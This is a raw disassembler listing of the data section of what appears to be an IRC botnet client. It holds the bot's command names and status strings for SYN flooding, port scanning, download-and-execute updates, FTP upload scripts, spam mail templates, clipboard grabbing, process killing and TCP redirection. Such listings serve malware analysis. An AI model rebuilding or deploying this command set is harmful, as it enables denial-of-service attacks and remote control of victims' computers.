dd 6D655220h, 6E69766Fh, 6F422067h, 2E74h, 2 dup(0)
unk_42D9A0 db 2 ; DATA XREF: sub_4087B3+4226�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 70h, 72h
db 6Fh ; o
db 63h, 1Fh, 73h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aFailedToStar_6 db ' Failed to start listing thread, error: <%d>.',0
dd 4 dup(0)
dword_42D9F4 dd 20025B02h, 7270202Dh, 731F636Fh, 202D201Fh, 20025D02h
; DATA XREF: sub_4087B3+41B7�o
dd 502020BBh, 63636F72h, 20737365h, 7473696Ch, 2Eh, 2 dup(0)
aFull db 'full',0 ; DATA XREF: sub_4087B3+4197�o
align 4
unk_42DA2C db 2 ; DATA XREF: sub_4087B3+4135�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 70h, 72h
db 6Fh ; o
db 63h, 1Fh, 73h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aAlreadyRunning db ' Already running.',0
dd 2 dup(0)
dword_42DA5C dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+40E4�o
dd 74705520h, 3A656D69h, 2E732520h, 2 dup(0)
dword_42DA84 dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+4055�o
dd 74654720h, 696C4320h, 616F6270h, 2E6472h, 2 dup(0)
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_4087B3+4027�o
align 8
dword_42DAC8 dd 20025B02h, 6C66202Dh, 64687375h, 1F731F6Eh, 2202D20h
; DATA XREF: sub_4087B3:loc_40C7CA�o
dd 0BB20025Dh
aFailedToFlushA db ' Failed to flush ARP cache.',0
align 10h
dd 2 dup(0)
dword_42DB08 dd 20025B02h, 6C66202Dh, 64687375h, 1F731F6Eh, 2202D20h
; DATA XREF: sub_4087B3+3FFC�o
dd 0BB20025Dh
aArpCacheFlushe db ' ARP cache flushed.',0
align 10h
dword_42DB40 dd 20025B02h, 6C66202Dh, 64687375h, 1F731F6Eh, 2202D20h
; DATA XREF: sub_4087B3:loc_40C79F�o
dd 0BB20025Dh
aFailedToLoadDn db ' Failed to load dnsapi.dll.',0
align 10h
dword_42DB80 dd 20025B02h, 6C66202Dh, 64687375h, 1F731F6Eh, 2202D20h
; DATA XREF: sub_4087B3:loc_40C798�o
dd 0BB20025Dh
aFailedToFlushD db ' Failed to flush DNS cache.',0
align 10h
dword_42DBC0 dd 20025B02h, 6C66202Dh, 64687375h, 1F731F6Eh, 2202D20h
; DATA XREF: sub_4087B3+3FDE�o
dd 0BB20025Dh
aDnsCacheFlushe db ' DNS cache flushed.',0
align 10h
dd 2 dup(0)
unk_42DBF8 db 2 ; DATA XREF: sub_4087B3+3F5B�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 68h, 74h
db 74h ; t
db 70h, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aFailedToStar_7 db ' Failed to start server thread, error: <%d>.',0
dd 4 dup(0)
unk_42DC4C db 2 ; DATA XREF: sub_4087B3+3EF0�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 68h, 74h
db 74h ; t
db 70h, 1Fh, 64h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aServerListen_0 db ' Server listening on IP: %s:%d, Directory: %s\.',0
align 10h
dword_42DCA0 dd 20025B02h, 6674202Dh, 1F701F74h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+3DE9�o
aFailedToStar_8 db ' Failed to start server thread, error: <%d>.',0
align 10h
dword_42DCF0 dd 20025B02h, 6674202Dh, 1F701F74h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+3D7A�o
aServerStarte_1 db ' Server started on Port: %d, File: %s, Request: %s.',0
align 4
dd 3 dup(0)
dword_42DD48 dd 20025B02h, 6674202Dh, 1F701F74h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+3CC1�o
aAlreadyRunni_0 db ' Already running.',0
align 10h
dd 2 dup(0)
dword_42DD78 dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3:loc_40C450�o
aFailedToStar_9 db ' Failed to start scan, port is invalid.',0
align 4
dd 3 dup(0)
unk_42DDC4 db 2 ; DATA XREF: sub_4087B3+3996�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aNickChangedToS db ' Nick changed to: ',27h,'%s',27h,'.',0
dd 2 dup(0)
unk_42DDF8 db 2 ; DATA XREF: sub_4087B3+3979�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aJoinedChannelS db ' Joined channel: ',27h,'%s',27h,'.',0
align 4
dd 2 dup(0)
unk_42DE2C db 2 ; DATA XREF: sub_4087B3+3958�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aPartedChannelS db ' Parted channel: ',27h,'%s',27h,'.',0
align 10h
dword_42DE60 dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+393E�o
dd 43524920h, 77615220h, 7325203Ah, 2Eh, 0
unk_42DE88 db 2 ; DATA XREF: sub_4087B3:loc_40C071�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 74h, 68h
db 72h ; r
db 65h, 61h, 64h
db 1Fh
db 73h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aFailedToKillTh db ' Failed to kill thread: %s.',0
dd 3 dup(0)
unk_42DEC8 db 2 ; DATA XREF: sub_4087B3+38B7�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 74h, 68h
db 72h ; r
db 65h, 61h, 64h
db 1Fh
db 73h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aKilledThreadS_ db ' Killed thread: %s.',0
dd 2 dup(0)
unk_42DEFC db 2 ; DATA XREF: sub_4087B3:loc_40C024�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 74h, 68h
db 72h ; r
db 65h, 61h, 64h
db 1Fh
db 73h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aNoActiveThread db ' No active threads found.',0
align 10h
dd 2 dup(0)
unk_42DF38 db 2 ; DATA XREF: sub_4087B3+3867�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 74h, 68h
db 72h ; r
db 65h, 61h, 64h
db 1Fh
db 73h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aStoppedDThread db ' Stopped: %d thread(s).',0
dd 3 dup(0)
dword_42DF74 dd 6C6C61h ; DATA XREF: sub_4087B3+384D�o
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_4087B3+37C4�o
; sub_4087B3:loc_40CD4C�o
align 4
unk_42DF88 db 2 ; DATA XREF: sub_4087B3+3748�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aPrefixChangedT db ' Prefix changed to: ',27h,'%c',27h,'.',0
align 10h
unk_42DFC0 db 2 ; DATA XREF: sub_4087B3:loc_40BEE2�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 68h
db 65h ; e
db 6Ch, 1Fh, 6Ch
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aCouldnTOpenF_0 db ' Couldn',27h,'t open file: %s',0
align 10h
dd 2 dup(0)
unk_42DFF8 db 2 ; DATA XREF: sub_4087B3+3725�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 73h, 68h
db 65h ; e
db 6Ch, 1Fh, 6Ch
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aFileOpenedS db ' File opened: %s',0
align 10h
dd 2 dup(0)
unk_42E028 db 2 ; DATA XREF: sub_4087B3+36F8�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aServerChangedT db ' Server changed to: ',27h,'%s',27h,'.',0
align 10h
dword_42E060 dd 20025B02h, 6E64202Dh, 1F731F6Ch, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3:loc_40BE7D�o
aCouldnTResol_0 db ' Couldn',27h,'t resolve hostname.',0
align 4
dd 2 dup(0)
dword_42E09C dd 20025B02h, 6E64202Dh, 1F731F6Ch, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+369C�o
aLookupSS_ db ' Lookup: %s -> %s.',0
dd 2 dup(0)
unk_42E0CC db 2 ; DATA XREF: sub_4087B3:loc_40BE18�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 70h, 72h
db 6Fh ; o
db 63h, 1Fh, 73h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aFailedToTermin db ' Failed to terminate process: %s',0
align 10h
unk_42E110 db 2 ; DATA XREF: sub_4087B3+365B�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 70h, 72h
db 6Fh ; o
db 63h, 1Fh, 73h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aProcessKilledS db ' Process killed: %s',0
align 4
dd 2 dup(0)
unk_42E144 db 2 ; DATA XREF: sub_4087B3:loc_40BDB4�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 70h, 72h
db 6Fh ; o
db 63h, 1Fh, 73h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aFailedToTerm_0 db ' Failed to terminate process ID: %s',0
align 10h
dd 3 dup(0)
unk_42E18C db 2 ; DATA XREF: sub_4087B3+35FA�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 70h, 72h
db 6Fh ; o
db 63h, 1Fh, 73h
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aProcessKilledI db ' Process killed ID: %s',0
align 4
dd 2 dup(0)
dword_42E1C4 dd 20025B02h, 6966202Dh, 1F651F6Ch, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+35B5�o
dd 65442020h, 6574656Ch, 25272064h, 2E2773h, 2 dup(0)
unk_42E1F0 db 2 ; DATA XREF: sub_4087B3+359B�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 76h, 69h
db 73h ; s
db 69h, 6Ch, 1Fh
db 74h ; t
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToStartC db ' Failed to start connection thread, error: <%d>.',0
dd 4 dup(0)
dword_42E248 dd 20025B02h, 6976202Dh, 1F6C6973h, 2D201F74h, 25D0220h
; DATA XREF: sub_4087B3+352C�o
dd 2020BB20h, 3A4C5255h, 2E732520h, 2 dup(0)
dword_42E270 dd 20025B02h, 696D202Dh, 1F631F72h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3:loc_40BC6C�o
dd 6F432020h, 6E616D6Dh, 65732064h, 2E746Eh, 2 dup(0)
dword_42E29C dd 20025B02h, 696D202Dh, 1F631F72h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+34AF�o
aClientNotOpen_ db ' Client not open.',0
align 4
dd 2 dup(0)
unk_42E2CC db 2 ; DATA XREF: sub_4087B3+347C�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aReadFileFailed db ' Read file failed: %s',0
align 10h
unk_42E300 db 2 ; DATA XREF: sub_4087B3+3466�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aReadFileComple db ' Read file complete: %s',0
dd 2 dup(0)
dword_42E334 dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+33E3�o
dd 74654720h, 74736F68h, 7325203Ah, 2Eh, 0
unk_42E35C db 2 ; DATA XREF: sub_4087B3+33A0�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aUnableToExtrac db ' Unable to extract Gethost command.',0
align 10h
unk_42E3A0 db 2 ; DATA XREF: sub_4087B3+3384�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aGethostSComman db ' Gethost: %s, Command: %s',0
align 10h
dd 2 dup(0)
unk_42E3D8 db 2 ; DATA XREF: sub_4087B3+32FA�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aAliasAddedS_ db ' Alias added: %s.',0
align 10h
dd 2 dup(0)
unk_42E408 db 2 ; DATA XREF: sub_4087B3+32B8�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aPrivmsgSS_ db ' Privmsg: %s: %s.',0
align 10h
dd 2 dup(0)
unk_42E438 db 2 ; DATA XREF: sub_4087B3+325E�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aActionSS_ db ' Action: %s: %s.',0
align 10h
dd 0
dword_42E464 dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+31EF�o
dd 63794320h, 2E656Ch, 2 dup(0)
aPartS_0 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_4087B3+31B3�o
; sub_4087B3+3948�o
align 4
unk_42E494 db 2 ; DATA XREF: sub_4087B3+318C�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aModeChangeS db ' Mode change: %s',0
align 10h
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_4087B3+317E�o
align 4
dword_42E4CC dd 20025B02h, 6C63202Dh, 1F656E6Fh, 2D201F73h, 25D0220h
; DATA XREF: sub_4087B3+3153�o
dd 2020BB20h, 20776152h, 29732528h, 7325203Ah, 2 dup(0)
dword_42E4F8 dd 20025B02h, 6C63202Dh, 1F656E6Fh, 2D201F73h, 25D0220h
; DATA XREF: sub_4087B3+30E5�o
dd 2020BB20h, 65646F4Dh, 73252820h, 25203A29h, 73h, 2 dup(0)
aModeS db 'MODE %s',0 ; DATA XREF: sub_4087B3+308D�o
dd 0
dword_42E534 dd 20025B02h, 6C63202Dh, 1F656E6Fh, 2D201F73h, 25D0220h
; DATA XREF: sub_4087B3+305B�o
dd 2020BB20h, 6B63694Eh, 73252820h, 25203A29h, 73h, 2 dup(0)
aNickS_0 db 'NICK %s',0 ; DATA XREF: sub_4087B3+3002�o
; sub_4087B3+378B�o
align 10h
aJoinSS_0 db 'JOIN %s %s',0 ; DATA XREF: sub_4087B3+2FE1�o
align 10h
aPartS db 'PART %s',0 ; DATA XREF: sub_4087B3+2F74�o
dd 0
unk_42E58C db 2 ; DATA XREF: sub_4087B3:loc_40B714�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 69h, 72h
db 1Fh
db 62h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aRepeatNotAllow db ' Repeat not allowed in command line: %s',0
dd 3 dup(0)
dword_42E5D4 dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3+2F26�o
dd 70655220h, 3A746165h, 732520h, 2 dup(0)
dword_42E5FC dd 20025B02h, 7269202Dh, 201F621Fh, 5D02202Dh, 20BB2002h
; DATA XREF: sub_4087B3:loc_40B642�o
dd 6C654420h, 2E7961h, 2 dup(0)
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_4087B3+2E4B�o
; sub_4087B3+2F00�o ...
align 10h
unk_42E630 db 2 ; DATA XREF: sub_4087B3+2DD0�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 75h, 70h
db 67h ; g
db 72h, 61h, 64h
db 1Fh
db 65h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aBotIdMustBeDif db ' Bot ID must be different than current running process.',0
dd 4 dup(0)
unk_42E690 db 2 ; DATA XREF: sub_4087B3+2DBA�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 75h, 70h
db 67h ; g
db 72h, 61h, 64h
db 1Fh
db 65h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aFailedToStartD db ' Failed to start download thread, error: <%d>.',0
align 4
dd 4 dup(0)
unk_42E6E8 db 2 ; DATA XREF: sub_4087B3+2D49�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 75h, 70h
db 67h ; g
db 72h, 61h, 64h
db 1Fh
db 65h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aDownloadingUpd db ' Downloading update from: %s.',0
align 10h
dd 2 dup(0)
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_4087B3+2CA4�o
align 4
dword_42E734 dd 20025B02h, 7865202Dh, 1F631F65h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+2C40�o
dd 6F432020h, 6E616D6Dh, 203A7364h, 7325h, 2 dup(0)
dword_42E760 dd 20025B02h, 7865202Dh, 1F631F65h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+2C35�o
aCouldnTExecute db ' Couldn',27h,'t execute file.',0
align 10h
dd 2 dup(0)
dword_42E798 dd 20025B02h, 6966202Dh, 1F651F6Ch, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3:loc_40B311�o
; sub_4087B3:loc_40BD6F�o
dd 20h, 0
dword_42E7B4 dd 20025B02h, 6966202Dh, 1F651F6Ch, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+2B49�o
aRenameSToS_ db ' Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 4
dd 2 dup(0)
unk_42E7EC db 2 ; DATA XREF: sub_4087B3+2B23�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 63h, 6Ch
db 6Fh ; o
db 6Eh, 65h, 1Fh
db 73h ; s
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aFailedToSta_10 db ' Failed to start clone thread, error: <%d>.',0
align 10h
dd 3 dup(0)
unk_42E83C db 2 ; DATA XREF: sub_4087B3+2AB4�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 63h, 6Ch
db 6Fh ; o
db 6Eh, 65h, 1Fh
db 73h ; s
db 1Fh, 20h, 2Dh
db 20h
db 2, 5Dh, 2
aCreatedOnSDInC db ' Created on %s:%d, in channel %s.',0
align 10h
dword_42E880 dd 20025B02h, 7973202Dh, 1F6E1F6Ch, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+2A23�o
aFailedToStartF db ' Failed to start flood thread, error: <%d>.',0
align 10h
dword_42E8D0 dd 20025B02h, 7973202Dh, 1F6E1F6Ch, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+29AF�o
aFloodingSSForS db ' Flooding: (%s:%s) for %s seconds.',0
dd 3 dup(0)
dword_42E914 dd 20025B02h, 6F64202Dh, 6F6C6E77h, 1F641F61h, 2202D20h
; DATA XREF: sub_4087B3+2935�o
dd 0BB20025Dh
aFailedToStartT db ' Failed to start transfer thread, error: <%d>.',0
dd 4 dup(0)
dword_42E96C dd 20025B02h, 6F64202Dh, 6F6C6E77h, 1F641F61h, 2202D20h
; DATA XREF: sub_4087B3+28C6�o
dd 0BB20025Dh
aDownloadingUrl db ' Downloading URL: %s to: %s.',0
align 4
dd 2 dup(0)
dword_42E9AC dd 20025B02h, 6572202Dh, 65726964h, 1F741F63h, 2202D20h
; DATA XREF: sub_4087B3+27F3�o
dd 0BB20025Dh
aFailedToSta_11 db ' Failed to start redirection thread, error: <%d>.',0
align 4
dd 4 dup(0)
dword_42EA08 dd 20025B02h, 6572202Dh, 65726964h, 1F741F63h, 2202D20h
; DATA XREF: sub_4087B3+2784�o
dd 0BB20025Dh
aTcpRedirectCre db ' TCP redirect created from: %s:%d to: %s:%d.',0
align 10h
dd 3 dup(0)
dword_42EA5C dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+2688�o
aPortScanStarte db ' Port scan started: %s:%d with delay: %d(ms).',0
align 10h
dd 3 dup(0)
aSSS_0 db '[%s] <%s> %s',0 ; DATA XREF: sub_4087B3+2602�o
align 4
aSSS db '[%s] * %s %s',0 ; DATA XREF: sub_4087B3+2503�o
align 4
dword_42EACC dd 54434101h, 204E4F49h, 17325h, 0 ; DATA XREF: sub_4087B3+2472�o
; sub_4087B3+323B�o
dword_42EADC dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+2411�o
; sub_4087B3+26F7�o ...
aFailedToSta_12 db ' Failed to start scan thread, error: <%d>.',0
dd 3 dup(0)
dword_42EB28 dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+23A2�o
; sub_4087B3+3BDE�o
aSPortScanStart db ' %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
dd 6 dup(0)
aSequential db 'Sequential',0 ; DATA XREF: sub_4087B3+2377�o
; sub_4087B3+3BB3�o
align 10h
aRandom db 'Random',0 ; DATA XREF: sub_4087B3+2370�o
; sub_4087B3+3BAC�o
align 4
dword_42EBC8 dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+222F�o
aFailedToSta_13 db ' Failed to start scan, no IP specified.',0
align 4
dd 3 dup(0)
dword_42EC14 dd 20025B02h, 6F72202Dh, 1F741F6Fh, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+20EB�o
; sub_4087B3+39F7�o
aAlreadyDScanni db ' Already %d scanning threads. Too many specified.',0
align 4
dd 4 dup(0)
dword_42EC6C dd 20025B02h, 7466202Dh, 1F641F70h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3:loc_40A81A�o
aUploadingFileS db ' Uploading file: %s to: %s failed.',0
align 10h
dword_42ECB0 dd 20025B02h, 7466202Dh, 1F641F70h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+2060�o
aUploadingFil_0 db ' Uploading file: %s to: %s',0
dd 3 dup(0)
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_4087B3+2047�o
align 8
aSS_4 db '-s:%s',0 ; DATA XREF: sub_4087B3+2030�o
align 10h
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_4087B3+2012�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
dd 2 dup(0)
aAb db 'ab',0 ; DATA XREF: sub_4087B3+1FED�o
align 10h
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_4087B3+1FDC�o
align 10h
dword_42ED40 dd 20025B02h, 7466202Dh, 1F641F70h, 2202D20h, 0BB20025Dh
; DATA XREF: sub_4087B3+1F66�o
aFileNotFoundS_ db ' File not found: %s.',0
align 4
dd 2 dup(0)
aFtp_upload db 'ftp.upload',0 ; DATA XREF: sub_4087B3+1F43�o
align 10h
dd 0
unk_42ED84 db 2 ; DATA XREF: sub_4087B3+1EF5�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 65h, 6Dh
db 61h ; a
db 69h, 1Fh, 6Ch
db 1Fh
db 20h, 2Dh, 20h
db 2
db 5Dh, 2, 20h
aMessageSentToS db ' Message sent to %s.',0
align 10h
dd 2 dup(0)
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_4087B3+1E81�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
dd 4 dup(0)
a_: ; DATA XREF: sub_4087B3+1DE2�o
unicode 0, <_>,0
aEmail db 'email',0 ; DATA XREF: sub_4087B3+1D91�o
align 10h
aAsc db 'asc',0 ; DATA XREF: sub_4087B3+1D7C�o
aAdvscan db 'advscan',0 ; DATA XREF: sub_4087B3+1D67�o
align 10h
aClone_a db 'clone.a',0 ; DATA XREF: sub_4087B3+1D40�o
dd 0
aClone_action db 'clone.action',0 ; DATA XREF: sub_4087B3+1D2B�o
align 4
aClone_pm db 'clone.pm',0 ; DATA XREF: sub_4087B3+1D16�o
align 4
aClone_privmsg db 'clone.privmsg',0 ; DATA XREF: sub_4087B3+1D01�o
align 4
aSc db 'sc',0 ; DATA XREF: sub_4087B3+1CEC�o
align 4
aPortscan db 'portscan',0 ; DATA XREF: sub_4087B3+1CD7�o
align 4
aSrv_rd_on db 'srv.rd.on',0 ; DATA XREF: sub_4087B3+1CC2�o
align 4
aSrv_redirect_o db 'srv.redirect.on',0 ; DATA XREF: sub_4087B3+1CAD�o
align 8
aDownload db 'download',0 ; DATA XREF: sub_4087B3+1C83�o
; sub_4087B3+1C98�o
align 4
aSyn db 'syn',0 ; DATA XREF: sub_4087B3+1C59�o
; sub_4087B3+1C6E�o
aC_make db 'c.make',0 ; DATA XREF: sub_4087B3+1C44�o
align 10h
aClone_make db 'clone.make',0 ; DATA XREF: sub_4087B3+1C2F�o
align 10h
aMv db 'mv',0 ; DATA XREF: sub_4087B3+1C08�o
align 4
aRename db 'rename',0 ; DATA XREF: sub_4087B3+1BF3�o
align 4
aE: ; DATA XREF: sub_4087B3+1BDE�o
unicode 0, <e>,0
aExecute db 'execute',0 ; DATA XREF: sub_4087B3+1BC9�o
dd 0
aUpdate db 'update',0 ; DATA XREF: sub_4087B3+1B9F�o
; sub_4087B3+1BB4�o
align 4
aDe db 'de',0 ; DATA XREF: sub_4087B3+1B8A�o
align 4
aDelay db 'delay',0 ; DATA XREF: sub_4087B3+1B75�o
align 10h
aRp db 'rp',0 ; DATA XREF: sub_4087B3+1B60�o
align 4
aRepeat db 'repeat',0 ; DATA XREF: sub_4087B3+1B4B�o
; sub_4087B3+2ED3�o
align 4
aClone_p db 'clone.p',0 ; DATA XREF: sub_4087B3+1B36�o
align 8
aClone_part db 'clone.part',0 ; DATA XREF: sub_4087B3+1B21�o
align 8
aClone_j db 'clone.j',0 ; DATA XREF: sub_4087B3+1B0C�o
dd 0
aClone_join db 'clone.join',0 ; DATA XREF: sub_4087B3+1AF7�o
align 10h
dd 0
aClone_n db 'clone.n',0 ; DATA XREF: sub_4087B3+1AE2�o
align 10h
aClone_nick db 'clone.nick',0 ; DATA XREF: sub_4087B3+1ACD�o
align 10h
aClone_m db 'clone.m',0 ; DATA XREF: sub_4087B3+1AB8�o
dd 0
aClone_mode db 'clone.mode',0 ; DATA XREF: sub_4087B3+1AA3�o
align 4
dd 0
aClone_r db 'clone.r',0 ; DATA XREF: sub_4087B3+1A8E�o
align 8
aClone_raw db 'clone.raw',0 ; DATA XREF: sub_4087B3+1A79�o
align 4
aM_0: ; DATA XREF: sub_4087B3+1A64�o
unicode 0, <m>,0
aMode db 'mode',0 ; DATA XREF: sub_4087B3+1A4F�o
align 10h
aCy db 'cy',0 ; DATA XREF: sub_4087B3+1A3A�o
align 4
aCycle db 'cycle',0 ; DATA XREF: sub_4087B3+1A25�o
align 4
aA_0: ; DATA XREF: sub_4087B3+1A10�o
unicode 0, <a>,0
aAction db 'action',0 ; DATA XREF: sub_4087B3+19FB�o
align 4
aPm_0 db 'pm',0 ; DATA XREF: sub_4087B3+19E6�o
align 4
aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_4087B3+19D1�o
align 8
aAa db 'aa',0 ; DATA XREF: sub_4087B3+19BC�o
align 4
aAddalias db 'addalias',0 ; DATA XREF: sub_4087B3+19A7�o
align 4
aGh db 'gh',0 ; DATA XREF: sub_4087B3+1980�o
align 4
aGethost db 'gethost',0 ; DATA XREF: sub_4087B3+196B�o
align 8
unk_42EFD8 db 2 ; DATA XREF: sub_4087B3:loc_40A0E8�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aCommandUnknown db ' Command unknown.',0
align 10h
dd 2 dup(0)
unk_42F008 db 2 ; DATA XREF: sub_4087B3:loc_40A0E1�o
db 5Bh, 2, 20h
db 2Dh ; -
db 20h, 6Eh, 65h
db 1Fh
db 74h, 1Fh, 20h
db 2Dh ; -
db 20h, 2, 5Dh
db 2
aNoMessageSpeci db ' No message specified.',0
align 4
